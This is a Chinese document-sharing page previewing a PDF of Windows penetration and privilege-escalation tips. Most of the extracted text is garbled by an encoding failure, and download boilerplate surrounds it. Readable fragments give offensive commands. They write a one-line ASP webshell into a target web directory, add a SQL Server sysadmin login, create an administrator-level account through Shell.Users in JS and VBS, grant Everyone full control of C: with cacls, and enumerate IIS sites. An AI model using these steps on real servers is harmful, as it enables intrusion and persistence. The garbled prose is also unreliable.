返回
Windows渗透与提权技巧汇总.pdf

Windows渗透与提权技巧汇总.pdf

ID:52522594

大小:126.70 KB

页数:25页

时间:2020-03-28

Windows渗透与提权技巧汇总.pdf_第1页
Windows渗透与提权技巧汇总.pdf_第2页
Windows渗透与提权技巧汇总.pdf_第3页
Windows渗透与提权技巧汇总.pdf_第4页
Windows渗透与提权技巧汇总.pdf_第5页
资源描述:

《Windows渗透与提权技巧汇总.pdf》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库

1、ᵜ᮷≷ᙫҶWindows⑇䘿оᨀᵳⲴཊњᢰᐗˈवਜ਼˖MSSQLḕ䈒࠶᷀ಘ䘎᧕䇠ᖅ␵䲔ǃVNCоRadminⲴᨀᵳᯩ⌅ǃCmdлⴞᖅⲴ᫽֌ᢰᐗԕ৺WebshellᨀᵳሿᢰᐗㅹDŽᯱㄉ䐟ᖴ䰞仈˖1ǃ䈫㖁ㄉ䝽㖞DŽ2ǃ⭘ԕлVBS˖1.OnErrorResumeNext2.If(LCase(Right(WScript.Fullname,11))="wscript.exe")Then3.MsgBoxSpace(12)&"IISVirtualWebViewer"&Space(12)&Chr(13)&Space(9)&"Usage:CscriptvWeb.vbs",4096,"Lilo"4.WScript

2、.Quit5.EndIf6.Setobjservice=GetObject("IIS://LocalHost/W3SVC")7.ForEachobj3wInobjservice8.IfIsNumeric(obj3w.Name)Then9.SetOService=GetObject("IIS://LocalHost/W3SVC/"&obj3w.Name)10.SetVDirObj=OService.GetObject("IIsWebVirtualDir","ROOT")11.IfErr<>0ThenWScript.Quit(1)12.WScript.EchoChr(10)&"["&OServ

3、ice.ServerComment&"]"13.ForEachBindsInOService.ServerBindings14.Web="{"&Replace(Binds,":","}{")&"}"15.WScript.EchoReplace(Split(Replace(Web,"",""),"}{")(2),"}","")16.Next17.WScript.Echo"Path:"&VDirObj.Path18.EndIf19.Next3ǃiis_spyࡇѮ(⌘˖䴰㾱᭟ᤱASPXˈ৽IISSPYⲴᯩ⌅˖ሶactiveds.dllˈactiveds.tlb䱽ᵳ)DŽ4ǃᗇࡠⴞḷㄉⴞᖅˈн㜭ⴤ᧕

4、䐘ⲴDŽਟԕ䙊䗷“echo^<%execute(request(“cmd”))%^>>>X:ⴞḷⴞᖅX.asp”ᡆ㘵“copy㝊ᵜ᮷ԦX:ⴞḷⴞᖅX.asp”ۿⴞḷⴞᖅ߉ޕwebshellˈᡆ㘵䘈ਟԕ䈅䈅typeભԔDŽ㖁ㄉਟ㜭ⴞᖅ(⌘˖а㡜ᱟ㲊ᤏѫᵪ㊫)˖data/htdocs.㖁ㄉ/㖁ㄉ/CMDл᫽֌VPN⴨ޣ⸕䇶ǃ䍴ᯉ˖#䇨administratorᤘޕ䈕VPN˖netshrassetuseradministratorpermit#⾱→administratorᤘޕ䈕VPN˖netshrassetuseradministratordeny#ḕⴻଚӋ⭘ᡧਟԕᤘޕVPN˖netshr

5、asshowuser#ḕⴻVPN࠶䝽IPⲴᯩᔿ˖netshrasipshowconfig#⭘ൠ൰⊐Ⲵᯩᔿ࠶䝽IP˖netshrasipsetaddrassignmethod=pool#ൠ൰⊐Ⲵ㤳തᱟӾ192.168.3.1ࡠ192.168.3.254˖netshrasipaddrangefrom=192.168.3.1to=192.168.3.254CmdǃDosભԔ㹼л␫࣐SQL⭘ᡧⲴᯩ⌅˖䴰㾱ᴹ㇑⨶ઈᵳ䲀ˈ൘ભԔлᔪ・ањ“c:test.qry”᮷Ԧˈ޵ᇩྲл˖execmaster.dbo.sp_addlogintest,123EXECsp_addsrvrolemember'test

6、,'sysadmin'❦ਾ൘DOSлᢗ㹼˖cmd.exe/cisql-E/Ualma/P/ic:test.qryਖ㊫Ⲵ࣐⭘ᡧᯩ⌅˖൘ࡐᦹҶnet.exe઼н⭘adsiѻཆˈᯠⲴ࣐⭘ᡧⲴᯩ⌅DŽԓ⸱ྲл˖js:1.varo=newActiveXObject("Shell.Users");2.z=o.create("test");3.z.changePassword("123456","")4.z.setting("AccountType")=3;5.vbs:6.viewsource7.Seto=CreateObject("Shell.Users")8.Setz=o.create("test"

7、)9.z.changePassword"123456",""10.z.setting("AccountType")=3Cmd䇯䰞᧗ࡦᵳ䲀᧗ࡦ˖ભԔྲл˖1.caclsc:/e/t/geveryone:F#cⴈeveryoneᵳ䲀2.cacls"ⴞᖅ"/deveryone#everyoneнਟ䈫ˈवᤜadmin༷⌘˖৽ࡦᯩ⌅ˈ൘᮷Ԧཀྵᆹޘ䇮㖞䟼ሶEveryone䇮ᇊѪнਟ䈫ˈྲ᷌⋑ᴹᆹޘᙗ䘹亩˖ᐕާ–᮷Ԧཀྵ䘹亩–⭘ㆰঅⲴޡ

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。